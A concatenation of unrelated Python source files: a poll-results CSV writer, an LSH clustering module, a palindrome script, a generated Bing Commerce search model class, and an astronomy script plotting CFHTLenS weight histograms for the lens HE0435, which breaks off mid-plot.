votes_sec = str(sorted_votes[1][1])
third = sorted_votes[2][0]
perc_third = str(round(100*sorted_votes[2][1]/total_votes,3))
votes_third = str(sorted_votes[2][1])
fourth = sorted_votes[3][0]
perc_fourth = str(round(100*sorted_votes[3][1]/total_votes,3))
votes_fourth = str(sorted_votes[3][1])
output_path = os.path.join('Resources', 'poll_results.csv')
with open(output_path, 'w') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',')
csvwriter.writerow(['Total Votes', 'First', 'Percentage', 'Votes', 'Second', 'Percentage', 'Votes', 'Third', 'Percentage', 'Votes', 'Fourth', 'Percentage', 'Votes'])
csvwriter.writerow([total_votes, first, perc_first, votes_first, second, perc_sec, votes_sec, third, perc_third, votes_third, fourth, perc_fourth, votes_fourth])
|
# -*- coding: utf-8 -*-
'''
Created on Dec 6th, 2017
@author: Varela
motivation: module provides clustering from distance and transforming (from structs)
'''
#Regex
import glob # Unix style GLOB performs pattern matching on files
import re
#Datascience stuff
import pandas as pd
import numpy as np
#Nice command line
import sys
DATASET_PATH='../../locality-sensitive-hashing/datasets/'
DISTANCE_MATRICES_PATTERN=DATASET_PATH + '*_distance_matrix.txt'
CLUSTER_MODELS_PATTERN=DATASET_PATH + '*_cluster.txt'
def cluster2txt(cluster, filename='distance_cluster.txt'):
'''
Converts a cluster dictionary into a file
INPUT
cluster<dict<int,int>>: cluster dict int, int
filename<string>: Name of the file to be generated
OUTPUT
'''
file_path=DATASET_PATH + filename
df = pd.DataFrame.from_dict(cluster,orient='index')
df.to_csv(file_path, sep=' ',index=True, index_label=False,header=None)
def clusterize(dist):
'''
INPUT
dist<float<D,D>>: dist numpy matrix
D<int>: number of original documents
OUTPUT
cluster<dict<int,int>>: cluster dict int, int
'''
thresh=1e-3 # this is our float 0
nrows, ncols= dist.shape
index= np.arange(ncols)
cluster={}
cluster_count=0
for r in range(nrows):
if not(r in cluster): #not a key then ways wasn't added
#Always add non added document
cluster[r]= cluster_count
ind = (dist[:,r]<thresh) & (index>r) # garantees dimensionality equivalence
if np.any(ind):
for i in index[ind]:
cluster[i]=cluster_count
cluster_count+=1
return cluster
def distance_matrix_clustering():
'''
This function generates a cluster for each file matching the regex *_distance_matrix.txt
INPUT
dist<float<D,D>>: Distance matrices @ dataset directory
D<int>: number of original documents
OUTPUT
cluster<int<D,2>>:
D<int>: number of original documents
'''
matcher = re.compile('(.*)_distance_matrix.txt$')
files=glob.glob(DISTANCE_MATRICES_PATTERN)
print('%d files found matching distance_matrix suffix' % len(files))
for i, file in enumerate(files):
print('Fetching %d file...' % (i+1))
df= pd.read_csv(file, sep= ' ', index_col=None, header=None, skiprows=1 )
dist= df.as_matrix()
print('Fetching %d file... done' % (i+1))
filename=file.split('/')[-1]
matchings= matcher.match(filename)
data_model=matchings.groups()[0]
print('Clustering of %s...' % (data_model))
cluster_filename=data_model+'_cluster.txt'
cluster=clusterize(dist)
print('Clustering of %s...done' % (data_model))
cluster2txt(cluster, filename=cluster_filename)
def cluster_txt2df(str_pattern):
'''
Scans dataset for clusters glob matching str_pattern and
returns all
INPUT
str_pattern<str>: Fetches a glob of files that match
OUTPUT
df<pandas.DataFrame>: index: observationsid
column.names: filenames
values:clusterid
examples:
str_pattern= '*_cluster.txt'
matches: 'gaussian_0.3_cluster.txt', 'sparse_0.4_cluster.txt' but not 'goldenset.csv'
'''
matcher = re.compile('(.*)_cluster.txt$')
str_pattern1= DATASET_PATH + str_pattern
files=glob.glob(str_pattern1)
M=len(files)
print('%d files found matching r\'%s\' pattern' % (M,str_pattern))
newnames=[]
for i, file in enumerate(files):
colname=get_filename(file)
print('Fetching %d\t%s...' % (i+1, colname))
if i==0:
df= pd.read_csv(file, sep= ' ',index_col=0, header=None)
df.columns=[colname]
else:
df_tmp= pd.read_csv(file, sep= ' ', index_col=0, header=None)
df_tmp.columns=[colname]
df=pd.concat((df,df_tmp),axis=1)
print('Fetching %d\t%s...done' % (i+1,colname))
return df
def cluster_dict2set(cluster_dict):
'''
Receives a cluster dict and computes a neightbourhood dict
INPUT
cluster_dict<int,int>: each value from the cluster dict is an integer
OUTPUT
neighbour_dict<int,set<int>>: each value from the neightbour dict is a set of integers of variable size
'''
neighbours_mapping={}
for key, value in cluster_dict.items():
if value in neighbours_mapping:
neighbours_mapping[value].append(key)
else:
neighbours_mapping[value]=[key]
return {key:set(neighbours_mapping[value]) for key, value in cluster_dict.items()}
def cluster_set2pairwise(neighbour_dict):
'''
Receives a neighbour dict which is a dict of sets
INPUT
neighbour_dict<int,set<int>>: each value from the neightbour dict is a set of integers of variable size
OUTPUT
list<set<int>>: is a list of sets: the inner set has either one element or a pair
'''
processed=set([])
list_of_pairs=[]
list_of_uniques=[]
count=0
x=len(neighbour_dict)
for doc_id, doc_neighbours in neighbour_dict.items():
sys.stdout.write('cluster_set2pairwise:%d of %d doc_id:%s \r' % (count,x,str(doc_id)))
sys.stdout.flush()
if not(doc_id in processed):
l= len(doc_neighbours)
this_elements={i for i in doc_neighbours}
if l==1:
list_of_uniques+=list(doc_neighbours)
else:
neighbours=list(doc_neighbours)
list_of_pairs+= [[neighbours[i],neighbours[j]] for i in range(l-1) for j in range(i+1,l)]
processed =processed.union(this_elements)
count+=1
set_uniques=set(list_of_uniques)
set_duplicates=lol2sos(list_of_pairs)
return set_duplicates, set_uniques
def lol2sos(list_of_lists):
'''
converts a list of list to a set of frozen sets
INPUT
pair_map<int,set<int>>:
OUTPUT
list<set<int>>: is a list of sets: the inner set has either one element or a pair
'''
return set(map(frozenset,list_of_lists))
def get_filename(filename):
'''
Removes filename's prefix and suffix
INPUT
filename<str>: fullname path
OUTPUT
filename1<str>: filename without extension or file_system stuff
'''
filename1= filename.split('/')[-1]
filename_parts= filename1.split('.')[:-1]
filename1= '.'.join(filename_parts)
return filename1
if __name__ == '__main__':
distance_matrix_clustering()
|
first_name = "PP"
last_name = "Singh"
output = "Hello, {} {}".format(first_name,last_name)
# output = f"Hello{first_name}"
print(output) |
import itertools
import sys
'''
To run:
python palindrome.py <string>
The time complexity is O(N) because we iterate through the string and
try to find a palindrome configuration. The worst case is where we:
a) obtain a palindrome by iterating through half the string, or
b) discover there are two singular letters when we have iterated
through half the string.
The space complexity is O(N) because we store the string as a list in
order to alter it in place.
'''
def palindrome(string):
original = list(string)
half = len(string) // 2 + 1
unpaired = 0
i = 0
while i < half:
# check if string is a palindrome
reverse = original[::-1]
if reverse == original:
return ''.join(original)
# if there are more than two single letters, it is not
# a palindrome
if unpaired > 1:
return ''
char = original[i]
# get substring that is behind 'char'
if i == 0:
sub = original[i+1:]
else:
sub = original[i+1:-i]
# if 'char' is also found in substring, then move 'char'
# in substring to the end.
if sub.count(char) > 0:
pos = sub.index(char) + i + 1
del original[pos]
if i == 0:
original.append(char)
else:
original.insert(-i, char)
i += 1
# if there is only one 'char', move 'char' to middle
else:
original.insert(half, char)
del original[i]
unpaired += 1
if len(sys.argv) != 2:
usage = 'python palindrome.py <string>'
print(usage)
else:
print(palindrome(sys.argv[1])) |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .request_query_clause_base import RequestQueryClauseBase
class RequestQueryClauseBlock(RequestQueryClauseBase):
"""Defines a list of QueryClauseBase objects that should all match. Nested
QueryClauseBlock within QueryClauseBlock is not allowed.
All required parameters must be populated in order to send to Azure.
:param _type: Required. Constant filled by server.
:type _type: str
:param values: A list of queryclausebase conditions to be applied.
:type values:
list[~microsoft.bing.commerce.search.models.RequestQueryClauseBase]
"""
_validation = {
'_type': {'required': True},
}
_attribute_map = {
'_type': {'key': '_type', 'type': 'str'},
'values': {'key': 'values', 'type': '[RequestQueryClauseBase]'},
}
def __init__(self, **kwargs):
super(RequestQueryClauseBlock, self).__init__(**kwargs)
self.values = kwargs.get('values', None)
self._type = 'QueryClauseBlock'
|
# fields CFHTLenS W1-4
# subfields: 171 1deg^2 throughout W1-4
# cells: 4x4arcmin covering each subfield, in a grid
# usage: use one of the following arguments: lens name, followed by orig or samp, followed by number of bins, followed by radius (45,60,90 or 120) and by maglimit
import numpy as np
import sys
import os
from os import system
#import scipy
#from scipy import special
#from astropy.io import fits
#from astropy.wcs import WCS
#from astropy import units as u
#from astropy.coordinates import SkyCoord
#from astropy.io import ascii
#from astropy.table import Table, Column
import time
import matplotlib.pyplot as plt
#from numpy.random import normal
from scipy.stats.kde import gaussian_kde
from numpy import linspace
print("Arguments: \n Lens field: %s \n Original values or samples drawn from P(z) and P(Mstar): %s \n Number of bins: %s \n Radius of each cell: %s \n Limiting i-band magnitude: %s" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]), str(sys.argv[5])))
if (str(sys.argv[2]) == "samp") or (str(sys.argv[2]) == "tab"):
print "This process is both processor and memory intensive and will take a couple of hours for a sampling of 1000..."
start_time = time.time()
with open('fieldsforhist50try_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:
listfields = f.readlines()
with open('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
for i in range(len(listfields)):
if "W1" in [x[0:len(listfields[0])-1] for x in listfields][i]:
with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
outfile.write(infile.read())
with open('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
for i in range(len(listfields)):
if "W2" in [x[0:len(listfields[0])-1] for x in listfields][i]:
with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
outfile.write(infile.read())
with open('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
for i in range(len(listfields)):
if "W3" in [x[0:len(listfields[0])-1] for x in listfields][i]:
with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
outfile.write(infile.read())
with open('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
for i in range(len(listfields)):
if "W4" in [x[0:len(listfields[0])-1] for x in listfields][i]:
with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
outfile.write(infile.read())
with open('fieldsforhist75try_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:
listfields = f.readlines()
with open('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
for i in range(len(listfields)):
if "W1" in [x[0:len(listfields[0])-1] for x in listfields][i]:
with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
outfile.write(infile.read())
with open('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
for i in range(len(listfields)):
if "W2" in [x[0:len(listfields[0])-1] for x in listfields][i]:
with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
outfile.write(infile.read())
with open('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
for i in range(len(listfields)):
if "W3" in [x[0:len(listfields[0])-1] for x in listfields][i]:
with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
outfile.write(infile.read())
with open('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:
for i in range(len(listfields)):
if "W4" in [x[0:len(listfields[0])-1] for x in listfields][i]:
with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:
outfile.write(infile.read())
cols=1
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.suptitle(r'HE0435 weight histogram test W1-W4', fontsize=10, y=0.998)
gauss_q_W1_50 = gaussian_kde(q_W1_50)
gauss_q_W2_50 = gaussian_kde(q_W2_50)
gauss_q_W3_50 = gaussian_kde(q_W3_50)
gauss_q_W4_50 = gaussian_kde(q_W4_50)
gauss_q_W1_75 = gaussian_kde(q_W1_75)
gauss_q_W2_75 = gaussian_kde(q_W2_75)
gauss_q_W3_75 = gaussian_kde(q_W3_75)
gauss_q_W4_75 = gaussian_kde(q_W4_75)
x = linspace(0,2,500)
plt.subplot(451)
rangemax=4
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)
ax=plt.subplot(451)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{gal}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 1
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=3
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
x = linspace(0,2,500)
gauss_q_W1_50 = gaussian_kde(q_W1_50)
gauss_q_W2_50 = gaussian_kde(q_W2_50)
gauss_q_W3_50 = gaussian_kde(q_W3_50)
gauss_q_W4_50 = gaussian_kde(q_W4_50)
gauss_q_W1_75 = gaussian_kde(q_W1_75)
gauss_q_W2_75 = gaussian_kde(q_W2_75)
gauss_q_W3_75 = gaussian_kde(q_W3_75)
gauss_q_W4_75 = gaussian_kde(q_W4_75)
plt.subplot(452)
rangemax=4
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)
ax=plt.subplot(452)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "50: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
#s = "75: %.3f,%.3f,%.3f" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{1}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
